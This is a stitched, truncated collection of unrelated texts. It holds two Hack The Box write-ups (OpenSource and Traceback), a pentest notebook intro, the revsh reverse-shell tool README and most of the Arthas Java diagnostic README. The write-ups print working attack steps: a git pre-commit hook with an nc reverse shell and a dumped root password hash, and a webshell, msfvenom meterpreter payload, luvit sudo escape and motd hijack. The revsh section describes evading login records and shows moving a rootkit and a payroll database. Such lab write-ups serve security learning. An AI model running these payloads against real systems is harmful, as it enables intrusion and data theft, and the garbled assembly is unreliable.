-m Backup for 2022-06-26 \n2022/06/26 20:04:01 CMD: UID=0 PID=11387 | /bin/bash /usr/local/bin/git-sync \n2022/06/26 20:04:01 CMD: UID=0 PID=11388 | git push origin main \n...\n``` \n\nWe can see the root runs ```git commit``` command, We can use [Git Hooks](https://githooks.com/) to write ```pre-commit``` hook.\n\nEvery Git repository has a ```.git/hooks``` folder with a script for each hook we can bind to.\n\nLet's add a pre-commit on ```/home/dev01/.git/hooks/pre-commit``` file (We can copy this file from ```/home/dev01/.git/hooks/pre-commit.sample```), We add ```ping``` command to POC:\n```console\ndev01@opensource:~/.git/hooks$ cat pre-commit\n#!/bin/sh\nping -c1 10.10.16.5\n\n```\n\nAnd we get a ```ping```:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ sudo tcpdump -i tun0 icmp\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on tun0, link-type RAW (Raw IP), capture size 262144 bytes\n23:14:01.486984 IP 10.10.11.164 > 10.10.14.14: ICMP echo request, id 14666, seq 1, length 64\n23:14:01.487002 IP 10.10.14.14 > 10.10.11.164: ICMP echo reply, id 14666, seq 1, length 64\n\n```\n\nNow, Let's change the ```ping``` request to the following reverse shell:\n```console\ndev01@opensource:~/.git/hooks$ cat pre-commit\n#!/bin/sh\nrm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4446 >/tmp/f\n```\n\nAnd we get a reverse shell:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ nc -lvp 4446\nlistening on [any] 4446 ...\n10.10.11.164: inverse host lookup failed: Unknown host\nconnect to [10.10.14.14] from (UNKNOWN) [10.10.11.164] 47800\n/bin/sh: 0: can't access tty; job control turned off\n# whoami\nroot\n# pwd\n/home/dev01\n# cat /root/root.txt\nd44173e61ad006def4f2feb5a4c454dc\n```\n\nAnd we get the root flag ```d44173e61ad006def4f2feb5a4c454dc```.\n\nPDF password:\n```console\n# cat /etc/shadow | grep root | cut -d':' -f2\n$6$5sA85UVX$HupltM.bMqXkLc269pHDk1lryc4y5LV0FPMtT3x.yUdbe3mGziC8aUXWRQ2K3jX8mq5zItFAkAfDgPzH8EQ1C/\n```"}}},{"rowIdx":527,"cells":{"text":{"kind":"string","value":"# Welcome to CSbyGB PenTips\n\n![CSbyGB 🌟 \"When you wonder, You're Learning\" - Mister Rogers 🌟 ](https://csbygb.github.io/img/csbygb.png) \n\n## $ whoami /priv\n\n🏳 Ethical Hacker |🏆Award-winning Pentester | Artemis Red Team | Board Member | Speaker | Mentor 🏳️‍🌈\n\n## What is this?\n\nThis is a gitbook with my pentest tips and notes from my learning journey as pentester (more than 400 pages to transfer here 😅). \nIt is a work in progress and it will be filled up asap with my notes and on the go as I learn new things everyday.\n\n## Disclamer\n\n❗🔴\n**Everything used and mentioned here has to be used for an ETHICAL purpose, do not engage in any illegal activity using these resources**\n❗🔴\n\n## I won!!\n\n**Thank you everyone for your support!! I won!!**\n\n![Woman Hacker 2022](./.res/woman-hacker.jpeg)\n\n## More about CSbyGB\n\n- [CSbyGB - LinkTree](https://linktr.ee/csbygb)\n- [CSbyGB - Blog](https://csbygb.github.io/)\n\n## Credits\n\nI took these notes while working but also when using different resources. \nHere is a list :\n\n- [XSSrat - Wesley Thijs - class prep for CNWPP](https://thexssrat.podia.com/view/courses/pentesting-101-the-ultimate-guide-from-start-to-finish-from-planning-to-reporting)\n- [TCM-Security](https://academy.tcm-sec.com/)\n- [Tryhackme](https://tryhackme.com/)\n- [Hackthebox - Academy](https://academy.hackthebox.com/)\n- [Hackthebox - Classic](https://www.hackthebox.com/)\n- [Udemy](https://www.udemy.com/)\n"}}},{"rowIdx":528,"cells":{"text":{"kind":"string","value":"# revsh #\n\n_revsh_ is a tool for establishing [reverse shells](http://en.wikipedia.org/wiki/Reverse_shell) with [terminal](http://en.wikipedia.org/wiki/Computer_terminal) support, reverse [VPNs](https://en.wikipedia.org/wiki/Virtual_private_network) for [advanced pivoting](https://en.wikipedia.org/wiki/Exploit_(computer_security)#Pivoting), as well as arbitrary data tunneling.\n\n## News ##\n\n* __2018-08-09__: New release. Mosly bug / stability fixes and better documentation on the build process with OpenSSL 1.1.0. See the _Installation_ section below for the updated build instructions.\n\n## Overview ##\n\n**What is a \"reverse shell\"?**\n\nA reverse shell is a network connection that grants [shell](http://en.wikipedia.org/wiki/Shell_%28computing%29) access to a remote host. As opposed to other remote login tools such as [telnet](http://en.wikipedia.org/wiki/Telnet) and [ssh](http://en.wikipedia.org/wiki/Secure_Shell), a reverse shell is initiated by the remote host. This technique of connecting outbound from the remote network allows for circumvention of firewalls that are configured to block inbound connections only. \n\n**What is a \"reverse VPN\"?**\n\n_revsh_ is capable of attaching a virtual ethernet card (tun/tap) to both ends of its crypto tunnel. These cards can then be used to forward raw IP packets or ethernet frames. When combined with an Iptables NAT rule, or bridging a real ethernet card, this allows for the operator to receive a fully routable IP address on the target machines network. This, essentially, is a full VPN that has performed a connect-back call to the operator to circumvent in-bound packet filtering and grant the operator full network access. (See [\"Documentation/REVERSE_VPN.md\"](https://github.com/emptymonkey/revsh/blob/master/Documentation/REVERSE_VPN.md) for more information.)\n\n**What is a \"bind shell\"?**\n\nA [bind shell](http://en.wikipedia.org/wiki/Shellcode#Remote) is a shell that is served from a normal forward network connection. _revsh_ supports both reverse and bind shells. To invoke a bind shell you can either invoke the _-b_ flag on both ends of the connection, or invoke the binary as '_bindsh_'.\n\n\n**Can't I just use [netcat](http://en.wikipedia.org/wiki/Netcat)?**\n\nThere are [many techniques](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) for establishing a reverse shell, but these methods don't provide terminal support. _revsh_ allows for a reverse shell whose connection is mediated by a [pseudo-terminal](http://en.wikipedia.org/wiki/Pseudoterminal), and thus allows for features such as:\n\n * [job control](http://en.wikipedia.org/wiki/Job_control)\n * [control character processing](http://en.wikipedia.org/wiki/Control_character) (e.g [Ctrl-C](http://en.wikipedia.org/wiki/Control-C))\n * [auto-completion](http://en.wikipedia.org/wiki/Auto-completion)\n * support for programs requiring a [controlling tty](https://github.com/emptymonkey/ctty) (e.g. vi)\n * [processing of window re-size events](http://linux.die.net/man/4/tty_ioctl)\n\nIn addition, _revsh_ also offers the following features:\n * [UTF-8](http://en.wikipedia.org/wiki/UTF-8) support.\n * Circumvents [utmp / wtmp](http://en.wikipedia.org/wiki/Utmp). (No login recorded.)\n * Processes [rc file](http://en.wikipedia.org/wiki/Run_commands) commands upon login for easy scripting.\n * [OpenSSL](https://www.openssl.org/) encryption with key based authentication baked into the binary.\n * Anonymous [Diffie-Hellman](http://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange) encryption upon request.\n * Ephemeral Diffie-Hellman encryption as default. (Now with more [Perfect Forward Secrecy](http://en.wikipedia.org/wiki/Forward_secrecy)!)\n * [Cert pinning](http://en.wikipedia.org/wiki/Transport_Layer_Security#Certificate_pinning) for protection against [sinkholes](http://en.wikipedia.org/wiki/DNS_sinkhole) and [mitm](http://en.wikipedia.org/wiki/Man-in-the-middle_attack) counter-intrusion.\n * Connection timeout for remote process self-termination.\n * Randomized retry timers for non-predictable auto-reconnection.\n * Netcat style non-interactive data brokering for file transfer.\n * Proxy support: point-to-point, SOCKS 4, SOCKS 4a, and SOCKS 5. Proxys are available in both directions for complete flexibility.\n * TUN / TAP support for forwarding raw IP packets / Ethernet frames.\n * Escape sequence commands to kill non-responsive nodes, or print connection statistics.\n\n\n_revsh_ is intended as a supplementary tool for a [pentester's](http://en.wikipedia.org/wiki/Pentester) toolkit that provides the full set of terminal features across an encrypted tunnel.\n\n**Where can I use _revsh_?**\n\n_revsh_ was developed on x86_64 Linux. Here is a brief list of Arch / OS combinations that it has been used on:\n * x86_64 Linux\n * i686 Linux\n * amd64 FreeBSD\n\n(If you have successfully used revsh on another platform, drop me a line and I'll add it to the list.)\n\n## Usage ##\n\n\tempty@monkey:~$ revsh -h\n\t\n\tControl:\trevsh -c [CONTROL_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]\n\tTarget:\t\trevsh [TARGET_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]\n\t\n\t\tADDRESS\t\tThe address of the control listener.\t\t(Default is \"0.0.0.0\".)\n\t\tPORT\t\tThe port of the control listener.\t\t(Default is \"2200\".)\n\t\n\tCONTROL_OPTIONS:\n\t\t-c\t\tRun in \"command and control\" mode.\t\t(Default is target mode.)\n\t\t-a\t\tEnable Anonymous Diffie-Hellman mode.\t\t(Default is Ephemeral Diffie-Hellman.)\n\t\t-d KEYS_DIR\tReference the keys in an alternate directory.\t(Default is \"~/.revsh/keys/\".)\n\t\t-f RC_FILE\tReference an alternate rc file.\t\t\t(Default is \"~/.revsh/rc\".)\n\t\t-s SHELL\tInvoke SHELL as the remote shell.\t\t(Default is \"/bin/bash\".)\n\t\t-F LOG_FILE\tLog general use and errors to LOG_FILE.\t\t(No default set.)\n\t\n\tTARGET_OPTIONS:\n\t\t-t SEC\t\tSet the connection timeout to SEC seconds.\t(Default is \"3600\".)\n\t\t-r SEC1,SEC2\tSet the retry time to be SEC1 seconds, or\t(Default is \"600,1200\".)\n\t\t\t\tto be random in the range from SEC1 to SEC2.\n\t\n\tMUTUAL_OPTIONS:\n\t\t-k\t\tRun in keep-alive mode.\n\t\t\t\tNode will neither exit normally, nor timeout.\n\t\t-L [LHOST:]LPORT:RHOST:RPORT\n\t\t\t\tStatic socket forwarding with a local listener\n\t\t\t\tat LHOST:LPORT forwarding to RHOST:RPORT.\n\t\t-R [RHOST:]RPORT:LHOST:LPORT\n\t\t\t\tStatic socket forwarding with a remote listener\n\t\t\t\tat RHOST:RPORT forwarding to LHOST:LPORT.\n\t\t-D [LHOST:]LPORT\n\t\t\t\tDynamic socket forwarding with a local listener\n\t\t\t\tat LHOST:LPORT.\t\t\t\t\t(Socks 4, 4a, and 5. TCP connect only.)\n\t\t-B [RHOST:]RPORT\n\t\t\t\tDynamic socket forwarding with a remote\n\t\t\t\tlistener at LHOST:LPORT.\t\t\t(Socks 4, 4a, and 5. TCP connect only.)\n\t\t-x\t\tDisable automatic setup of proxies.\t\t(Defaults: Proxy D2280 and tun/tap devices.)\n\t\t-b\t\tStart in bind shell mode.\t\t\t(Default is reverse shell mode.)\n\t\t\t\tThe -b flag must be invoked on both ends.\n\t\t-n\t\tNon-interactive netcat style data broker.\t(Default is interactive w/remote tty.)\n\t\t\t\tNo tty. Useful for copying files.\n\t\t-v\t\tVerbose. -vv and -vvv increase verbosity.\n\t\t-V\t\tPrint the program and protocol versions.\n\t\t-h\t\tPrint this help.\n\t\t-e\t\tPrint out some usage examples.\n\n## Installation ##\n\nFirst, you will need to build OpenSSL from source. (See __NOTE__ below.)\n\n\tgit clone https://github.com/openssl/openssl.git\n\tcd openssl/\n\t./config no-shared -static\t# These options are needed to build static applications against OpenSSL.\n\tmake && make test\t# We skip \"make install\" so we don't conflict with your systems default OpenSSL. We will build _revsh_ against the OpenSSL we just compiled in this tree.\n\tcd ..\n\nNow build revsh.\n\n\tgit clone https://github.com/emptymonkey/revsh.git\n\tcd revsh\n\tvi config.h # Set up new defaults that fit your situation.\n\tvi Makefile # Check that the selected build environment is the one you want. (It probably already is by default.)\n\tmake # This *can* take a very long time, though it usually doesn't.\n\tmake install\n\tvi ~/.revsh/rc # Add your favorite startup commands to really customize the feel of your remote shell.\n\trevsh -h\n\n__NOTE:__ With the release of OpenSSL 1.1.0, OpenSSL needs to be built from source for use in a statically linked binary. Building a statically linked binary against the OpenSSL libraries that ship with most Linux distros (including Kali) will *not* work. (If it builds at all, it will SEGFAULT.)\n\n## Examples ##\n\nControl host example IP: 192.168.0.42\n
\nTarget host example IP: 192.168.0.66\n\n\tInteractive example on default port '2200':\n\t\tcontrol:\trevsh -c\n\t\ttarget:\t\trevsh 192.168.0.42\n\t\n\tInteractive example on non-standard port '443':\n\t\tcontrol:\trevsh -c 192.168.0.42:443\n\t\ttarget:\t\trevsh 192.168.0.42:443\n\t\n\tBindshell example:\n\t\ttarget:\t\trevsh -b\n\t\tcontrol:\trevsh -c -b 192.168.0.66\n\t\n\tNon-interactive file upload example:\n\t\tcontrol:\tcat ~/bin/rootkit | revsh -c -n\n\t\ttarget:\t\trevsh 192.168.0.42 > ./totally_not_a_rootkit\n\t\n\tNon-interactive file download example:\n\t\tcontrol:\trevsh -c -n >payroll_db.tar\n\t\ttarget:\t\tcat payroll_db.tar | revsh 192.168.0.42\n\t\n\tNon-interactive file download example across existing tunnel:\n\t\tcontrol:\trevsh -c -n 127.0.0.1:2291 >payroll_db.tar\n\t\ttarget:\t\tcat payroll_db.tar | revsh 127.0.0.1:2290\n\n"}}},{"rowIdx":529,"cells":{"text":{"kind":"string","value":"# Traceback\n\nMachine IP: 10.10.10.181 \n\n# Enumeration\n\n```s\nnmap -sV -sC 10.10.10.181\n```\n\nService detection: `-sV`\n\nOutput:\n\n```s\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)\n| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)\n|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)\n80/tcp open http Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n|_http-title: Help us\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n```\n\n`http-title` is interesting.\n\n```s\nnmap -sC -sV -A -v -p- -oA full_scan 10.10.10.181 -T4\n```\n\nNo further interesting things.\n\n# Port 80\n\nApache httpd 2.4.29 ((Ubuntu)) server on port 80. Have a visit: `http://10.10.10.181:80`.\n\nEnumerating it further. Found the following stuff:\n\n```s\nhttp://10.10.10.181:80/icons/ 403 (Forbidden)\nhttp://10.10.10.181:80/icons/small/ 403 (Forbidden)\nhttp://10.10.10.181:80/index.html 200 (OK)\nhttp://10.10.10.181:80/server-status 403 (Forbidden)\n```\n\n# Source-code (Foothold)\n\nSourcecode of the page says ``. On searching this along with `Xh4H`, we reach this [tweet](https://twitter.com/riftwhitehat/status/1237311680276647936?lang=en) by the same person pointing to a repo of some web shells. Searching these on the actual server, one hit is found.\n\n```\nhttp://10.10.10.181/smevk.php\n```\n\nOpening this file `smevk.php`, the username and password are `admin` and `admin`.\n\nThis is a pretty useless shell, except it has write access. So cool. Let us create a custom payload and send it there.\n\n1. `msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.45 LPORT=1234 -f raw -o shell.php`\n\n2. Set up a listener\n\n```\nuse exploit/multi/handler \nset LHOST 10.10.14.45\nset LPORT 1234\nset PAYLOAD php/meterpreter/reverse_tcp \nexploit\n```\n\n3. Load `http://10.10.10.181/shell.php` in the browser.\n\n4. Type `shell` to get a shell.\n\n5. Upgrade the shell: `python3 -c 'import pty;pty.spawn(\"/bin/bash\")'`\n\n\n# Enumeration inside the system\n\nInside the home directory, there is this `webadmin` which has a `note.txt` which says:\n\n```\n- sysadmin -\nI have left a tool to practice Lua.\nI'm sure you know where to find it.\nContact me if you have any question.\n```\n\nRunning `sudo -l` gives the following:\n\n`(sysadmin) NOPASSWD: /home/sysadmin/luvit`\n\nRunning `sudo -u sysadmin /home/sysadmin/luvit` runs a lua file.\n\n# Privelege escalation to user sysadmin\n\nSpawn a shell:\n\n```\nsudo -u sysadmin /home/sysadmin/luvit -e 'os.execute(\"/bin/sh\")'\n```\n\nUpgrade the shell using `python3 -c 'import pty;pty.spawn(\"/bin/bash\")'`\n\nGo to the `user.txt` in `home` to get the user flag.\n\n# Privilege escalation to root\n\nFurther searching reveals `OpenSSH RSA public key` file in `.ssh` directory within `sysadmin` in `home`. Then tried to add a known host to those files for a passwordless login:\n\n\n1. `ssh-keygen` on local system: generates private and public keys\n\n2. Copy entire public key to the `sysadmin` `authorized_keys` on the remote end. `echo ... > authorized_keys`\n\n3. Attempt login `ssh sysadmin@10.10.10.181` from your end. You will see `Welcome to Xh4H land`.\n\nOn further searching, found that these are located in `/etc/update-motd.d` as `00-header` which is writable by the group `sysadmin` and created by `root`. \n\n1. Add `echo \"cat root/root.txt\" >> 00-header` (I guess this >> is there instead of > because we need to append not overwrite).\n\n2. Re-attempt ssh login from the device. The hash gets printed.\n\n\nAnd how exactly I searched? `linpeas` from [this link](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh\n) gave output that involved:\n\n```\n/bin/sh -c sleep 30 ; /bin/cp /var/backup/.update-motd.d/* /etc/update-motd.d/\n```\n\nImplies a shell script that after every 30 seconds copies the contents of backup motd to the main motd. \n\nSending `linpeas` over `nc` was not sufficient. Needed to:\n\n1. `python -m SimpleHTTPServer 80` on the attacker machine.\n\n2. `wget http://IP:80/linpeas.sh` and `sh linpeas.sh`"}}},{"rowIdx":530,"cells":{"text":{"kind":"string","value":"## Arthas\n\n![arthas](site/src/site/sphinx/arthas.png)\n\n[![Build Status](https://github.com/alibaba/arthas/workflows/JavaCI/badge.svg)](https://github.com/alibaba/arthas/actions)\n[![codecov](https://codecov.io/gh/alibaba/arthas/branch/master/graph/badge.svg)](https://codecov.io/gh/alibaba/arthas)\n[![maven](https://img.shields.io/maven-central/v/com.taobao.arthas/arthas-packaging.svg)](https://search.maven.org/search?q=g:com.taobao.arthas)\n![license](https://img.shields.io/github/license/alibaba/arthas.svg)\n[![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas \"Average time to resolve an issue\")\n[![Percentage of issues still open](http://isitmaintained.com/badge/open/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas \"Percentage of issues still open\")\n\n`Arthas` is a Java Diagnostic tool open sourced by Alibaba.\n\nArthas allows developers to troubleshoot production issues for Java applications without modifying code or restarting servers.\n\n[中文说明/Chinese Documentation](README_CN.md)\n\n### Background\n\nOften times, the production system network is inaccessible from the local development environment. If issues are encountered in production systems, it is impossible to use IDEs to debug the application remotely. More importantly, debugging in production environment is unacceptable, as it will suspend all the threads, resulting in the suspension of business services. \n\nDevelopers could always try to reproduce the same issue on the test/staging environment. However, this is tricky as some issues cannot be reproduced easily on a different environment, or even disappear once restarted. \n\nAnd if you're thinking of adding some logs to your code to help troubleshoot the issue, you will have to go through the following lifecycle; test, staging, and then to production. Time is money! This approach is inefficient! Besides, the issue may not be reproducible once the JVM is restarted, as described above.\n\nArthas was built to solve these issues. A developer can troubleshoot your production issues on-the-fly. No JVM restart, no additional code changes. Arthas works as an observer, which will never suspend your existing threads.\n\n### Key features\n\n* Check whether a class is loaded, or where the class is being loaded. (Useful for troubleshooting jar file conflicts)\n* Decompile a class to ensure the code is running as expected.\n* View classloader statistics, e.g. the number of classloaders, the number of classes loaded per classloader, the classloader hierarchy, possible classloader leaks, etc.\n* View the method invocation details, e.g. method parameter, return object, thrown exception, and etc.\n* Check the stack trace of specified method invocation. This is useful when a developers wants to know the caller of the said method.\n* Trace the method invocation to find slow sub-invocations.\n* Monitor method invocation statistics, e.g. qps, rt, success rate and etc.\n* Monitor system metrics, thread states and cpu usage, gc statistics, and etc.\n* Supports command line interactive mode, with auto-complete feature enabled.\n* Supports telnet and websocket, which enables both local and remote diagnostics with command line and browsers.\n* Supports profiler/Flame Graph\n* Support get objects in the heap that are instances of the specified class. \n* Supports JDK 6+.\n* Supports Linux/Mac/Windows.\n\n\n### [Online Tutorials(Recommended)](https://arthas.aliyun.com/doc/arthas-tutorials.html?language=en)\n\n* [Usages](tutorials/katacoda/README.md#online-tutorial-usages)\n\n### Quick start\n\n#### Use `arthas-boot`(Recommended)\n\nDownload`arthas-boot.jar`,Start with `java` command:\n\n```bash\ncurl -O https://arthas.aliyun.com/arthas-boot.jar\njava -jar arthas-boot.jar\n```\n\nPrint usage:\n\n```bash\njava -jar arthas-boot.jar -h\n```\n\n#### Use `as.sh`\n\nYou can install Arthas with one single line command on Linux, Unix, and Mac. Copy the following command and paste it into the command line, then press *Enter* to run:\n\n```bash\ncurl -L https://arthas.aliyun.com/install.sh | sh\n```\n\nThe command above will download the bootstrap script `as.sh` to the current directory. You can move it any other place you want, or put its location in `$PATH`.\n\nYou can enter its interactive interface by executing `as.sh`, or execute `as.sh -h` for more help information.\n\n\n### Documentation\n\n* [Online Tutorials(Recommended)](https://arthas.aliyun.com/doc/arthas-tutorials.html?language=en)\n* [User manual](https://arthas.aliyun.com/doc/en)\n* [Installation](https://arthas.aliyun.com/doc/en/install-detail.html)\n* [Download](https://arthas.aliyun.com/doc/en/download.html)\n* [Quick start](https://arthas.aliyun.com/doc/en/quick-start.html)\n* [Advanced usage](https://arthas.aliyun.com/doc/en/advanced-use.html)\n* [Commands](https://arthas.aliyun.com/doc/en/commands.html)\n* [WebConsole](https://arthas.aliyun.com/doc/en/web-console.html)\n* [Docker](https://arthas.aliyun.com/doc/en/docker.html)\n* [Arthas Spring Boot Starter](https://arthas.aliyun.com/doc/en/spring-boot-starter.html)\n* [User cases](https://github.com/alibaba/arthas/issues?q=label%3Auser-case)\n* [FAQ](https://arthas.aliyun.com/doc/en/faq)\n* [Compile and debug/How to contribute](https://github.com/alibaba/arthas/blob/master/CONTRIBUTING.md)\n* [Release Notes](https://github.com/alibaba/arthas/releases)\n\n\n### Feature Showcase\n\n#### Dashboard\n\n* https://arthas.aliyun.com/doc/en/dashboard\n\n![dashboard](site/src/site/sphinx/_static/dashboard.png)\n\n#### Thread\n\n* https://arthas.aliyun.com/doc/en/thread\n\nSee what is eating your CPU (ranked by top CPU usage) and what is going on there in one glance:\n\n```bash\n$ thread -n 3\n\"as-command-execute-daemon\" Id=29 cpuUsage=75% RUNNABLE\n at sun.management.ThreadImpl.dumpThreads0(Native Method)\n at sun.management.ThreadImpl.getThreadInfo(ThreadImpl.java:440)\n at com.taobao.arthas.core.command.monitor200.ThreadCommand$1.action(ThreadCommand.java:58)\n at com.taobao.arthas.core.command.handler.AbstractCommandHandler.execute(AbstractCommandHandler.java:238)\n at com.taobao.arthas.core.command.handler.DefaultCommandHandler.handleCommand(DefaultCommandHandler.java:67)\n at com.taobao.arthas.core.server.ArthasServer$4.run(ArthasServer.java:276)\n at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)\n at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)\n at java.lang.Thread.run(Thread.java:745)\n\n Number of locked synchronizers = 1\n - java.util.concurrent.ThreadPoolExecutor$Worker@6cd0b6f8\n\n\"as-session-expire-daemon\" Id=25 cpuUsage=24% TIMED_WAITING\n at java.lang.Thread.sleep(Native Method)\n at com.taobao.arthas.core.server.DefaultSessionManager$2.run(DefaultSessionManager.java:85)\n\n\"Reference Handler\" Id=2 cpuUsage=0% WAITING on java.lang.ref.Reference$Lock@69ba0f27\n at java.lang.Object.wait(Native Method)\n - waiting on java.lang.ref.Reference$Lock@69ba0f27\n at java.lang.Object.wait(Object.java:503)\n at java.lang.ref.Reference$ReferenceHandler.run(Reference.java:133)\n```\n\n#### jad\n\n* https://arthas.aliyun.com/doc/en/jad\n\nDecompile your class with one shot:\n\n```java\n$ jad javax.servlet.Servlet\n\nClassLoader:\n+-java.net.URLClassLoader@6108b2d7\n +-sun.misc.Launcher$AppClassLoader@18b4aac2\n +-sun.misc.Launcher$ExtClassLoader@1ddf84b8\n\nLocation:\n/Users/xxx/work/test/lib/servlet-api.jar\n\n/*\n * Decompiled with CFR 0_122.\n */\npackage javax.servlet;\n\nimport java.io.IOException;\nimport javax.servlet.ServletConfig;\nimport javax.servlet.ServletException;\nimport javax.servlet.ServletRequest;\nimport javax.servlet.ServletResponse;\n\npublic interface Servlet {\n public void init(ServletConfig var1) throws ServletException;\n\n public ServletConfig getServletConfig();\n\n public void service(ServletRequest var1, ServletResponse var2) throws ServletException, IOException;\n\n public String getServletInfo();\n\n public void destroy();\n}\n```\n\n#### mc\n* https://arthas.aliyun.com/doc/en/mc\n\nMemory compiler, compiles `.java` files into `.class` files in memory.\n\n```bash\n$ mc /tmp/Test.java\n```\n\n#### retransform\n\n* https://arthas.aliyun.com/doc/en/retransform\n\nLoad the external `*.class` files to retransform/hotswap the loaded classes in JVM.\n\n```bash\nretransform /tmp/Test.class\nretransform -c 327a647b /tmp/Test.class /tmp/Test\\$Inner.class\n```\n\n#### sc\n\n* https://arthas.aliyun.com/doc/en/sc\n\nSearch any loaded class with detailed information.\n\n```bash\n$ sc -d org.springframework.web.context.support.XmlWebApplicationContext\n class-info org.springframework.web.context.support.XmlWebApplicationContext\n code-source /Users/xxx/work/test/WEB-INF/lib/spring-web-3.2.11.RELEASE.jar\n name org.springframework.web.context.support.XmlWebApplicationContext\n isInterface false\n isAnnotation false\n isEnum false\n isAnonymousClass false\n isArray false\n isLocalClass false\n isMemberClass false\n isPrimitive false\n isSynthetic false\n simple-name XmlWebApplicationContext\n modifier public\n annotation\n interfaces\n super-class +-org.springframework.web.context.support.AbstractRefreshableWebApplicationContext\n +-org.springframework.context.support.AbstractRefreshableConfigApplicationContext\n +-org.springframework.context.support.AbstractRefreshableApplicationContext\n +-org.springframework.context.support.AbstractApplicationContext\n +-org.springframework.core.io.DefaultResourceLoader\n +-java.lang.Object\n class-loader +-org.apache.catalina.loader.ParallelWebappClassLoader\n +-java.net.URLClassLoader@6108b2d7\n +-sun.misc.Launcher$AppClassLoader@18b4aac2\n +-sun.misc.Launcher$ExtClassLoader@1ddf84b8\n classLoaderHash 25131501\n\n```\n\n\n#### vmtool\n\n* https://arthas.aliyun.com/doc/en/vmtool\n\nGet objects in the heap that are instances of the specified class.\n\n```bash\n$ vmtool --action getInstances --className java.lang.String --limit 10\n@String[][\n @String[com/taobao/arthas/core/shell/session/Session],\n @String[com.taobao.arthas.core.shell.session.Session],\n @String[com/taobao/arthas/core/shell/session/Session],\n @String[com/taobao/arthas/core/shell/session/Session],\n @String[com/taobao/arthas/core/shell/session/Session.class],\n @String[com/taobao/arthas/core/shell/session/Session.class],\n @String[com/taobao/arthas/core/shell/session/Session.class],\n @String[com/],\n @String[java/util/concurrent/ConcurrentHashMap$ValueIterator],\n @String[java/util/concurrent/locks/LockSupport],\n]\n```\n\n#### stack\n\n* https://arthas.aliyun.com/doc/en/stack\n\nView the call stack of `test.arthas.TestStack#doGet`:\n\n```bash\n$ stack test.arthas.TestStack doGet\nPress Ctrl+C to abort.\nAffect(class-cnt:1 , method-cnt:1) cost in 286 ms.\nts=2018-09-18 10:11:45;thread_name=http-bio-8080-exec-10;id=d9;is_daemon=true;priority=5;TCCL=org.apache.catalina.loader.ParallelWebappClassLoader@25131501\n @test.arthas.TestStack.doGet()\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:624)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:731)\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)\n at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)\n at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220)\n at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)\n ...\n at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)\n at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)\n at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)\n at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451)\n at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1121)\n at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637)\n at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316)\n at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)\n at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)\n at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\n at java.lang.Thread.run(Thread.java:745)\n```\n\n#### Trace\n\n* https://arthas.aliyun.com/doc/en/trace\n\nSee what is slowing down your method invocation with trace command:\n\n![trace](site/src/site/sphinx/_static/trace.png)\n\n#### Watch\n\n* https://arthas.aliyun.com/doc/en/watch\n\nWatch the first parameter and thrown exception of `test.arthas.TestWatch#doGet` only if it throws exception.\n\n```bash\n$ watch test.arthas.TestWatch doGet {params[0], throwExp} -e\nPress Ctrl+C to abort.\nAffect(class-cnt:1 , method-cnt:1) cost in 65 ms.\nts=2018-09-18 10:26:28;result=@ArrayList[\n @RequestFacade[org.apache.catalina.connector.RequestFacade@79f922b2],\n @NullPointerException[java.lang.NullPointerException],\n]\n```\n\n#### Monitor\n\n* https://arthas.aliyun.com/doc/en/monitor\n\nMonitor a specific method invocation statistics, including the total number of invocations, average response time, success rate, and every 5 seconds:\n\n```bash\n$ monitor -c 5 